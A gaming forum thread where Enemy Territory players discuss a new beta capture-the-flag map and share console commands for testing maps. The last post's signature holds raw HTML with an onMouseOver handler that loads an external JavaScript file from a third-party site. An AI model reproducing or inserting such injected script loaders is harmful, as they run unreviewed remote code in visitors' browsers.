Very impressive new map out.

Discussion for ET Players

Moderators: Forum moderators, developers

Majikthise

Very impressive new map out.

Post by Majikthise »

There's a new map out called "towerandslider_ctf_beta". It's made very well, and really fun too. Here's some screenshots:

It takes a few plays to figure out just where to go, but it isn't very difficult once you figure it out. You spawn near the top (the large rooms), than slide to the bottom, or, if you're good enough, and fall in a slide, you won't be hurt. Once at the bottom, you must climb back up, where the three gold boxes are placed at three different levels. Once you have one, find a slide, and head back down to the bottom to drop it off. Just make sure you slide into your own gold dropoff area. There are team doors that connect the two dropoff areas (dirt between the two, so the area can be mined), and they can be dynamited and rebuilt as your own team door. There are a few more team gates at the top, and even a few dirt covered platforms for mines. Also, there are indicator signs up in a few places that display which gold boxes are still intact (green dot), which are currently in enemy possesion (yellow dot) and which have been successfuly stolen (red dot). They also tell which floor the box is on.

This is still a beta, as the name suggests, but it's VERY good so far. About the only thing that needs to be done is possibly some outside detail, possibly terrain (even though you never go out there), and the middle spiral slows you down kinda often. Other than that, there are no errors in this one.

So far, there are only two servers running it, and neither is very good. So, someone out there... PLEASE set up a server for it :P. I wanna play with more than three people per team.
basterd

Post by basterd »

Wow yeah, that map looks awesome. I'm gonna download it immediately. Btw, what's the command to test maps? (not in mp)
Now i've seen that map I really need to start playing et.
/ / / M5 Power
=FF=im2good4u

Post by =FF=im2good4u »

lmao that map is funny lol

oh to test just open the wolfmp.exe and open console

type /devmap
/map <bsp mapname>
basterd

Post by basterd »

=FF=im2weak4u wrote:lmao that map is funny lol

oh to test just open the wolfmp.exe and open console

type /devmap
/map <bsp mapname>
allright, thanks man
/ / / M5 Power
Rain

Post by Rain »

What a strange map :shock:

I like it, in a sick sort of way... My server's running it now...
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>